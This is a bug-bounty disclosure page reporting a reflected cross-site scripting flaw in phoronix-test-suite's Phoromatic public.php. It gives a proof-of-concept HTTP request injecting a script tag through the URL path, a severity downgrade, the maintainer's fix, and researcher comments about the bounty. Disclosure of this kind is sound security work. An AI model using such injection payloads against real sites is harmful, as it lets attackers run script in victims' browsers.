Cross-site Scripting ( XSS) - Reflected in phoronix-test-suite/phoronix-test-suite

Valid

Reported on

Jun 23rd 2022


Description

Please enter a description of the vulnerability. File pts-core/phoromatic/public_html/public.php line 258 of public.php sends unvalidated data to a web browser, which can result in the browser executing malicious code.

Proof of Concept


GET /test"><script>alert(1)</script> HTTP/1.1
Host: localhost:8670
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:99.0) Gecko/20100101 Firefox/99.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=do8d0t932flbqqlmc9tj6hcjdk
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Pragma: no-cache
Cache-Control: no-cache

// PoC.js
var payload = ...

Impact

web-interface https://github.com/phoronix-test-suite/phoronix-test-suite/blob/master/pts-core/phoromatic/public_html/public.php

We are processing your report and will contact the phoronix-test-suite team within 24 hours. 2 months ago
We have contacted a member of the phoronix-test-suite team and are waiting to hear back 2 months ago
phoronix-test-suite/phoronix-test-suite maintainer modified the Severity from Critical to Low 2 months ago
The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
phoronix-test-suite/phoronix-test-suite maintainer validated this vulnerability 2 months ago
trongkykma has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
phoronix-test-suite/phoronix-test-suite maintainer confirmed that a fix has been merged on e4ff08 2 months ago
The fix bounty has been dropped
trongkykma
2 months ago

Researcher


i am not understanding why i am not getting the bounty?

trongkykma
2 months ago

Researcher


XSS error is not understood how you can rate it low ? @phoronix-test-suite

cvpa1k21
2 months ago

It's just a XSS Reflected bug bro @trongkykma - You need to learn more about the effects of each type of XSS bro :)))))

cvpa1k21
2 months ago

ưhat's up!!!!!

to join this conversation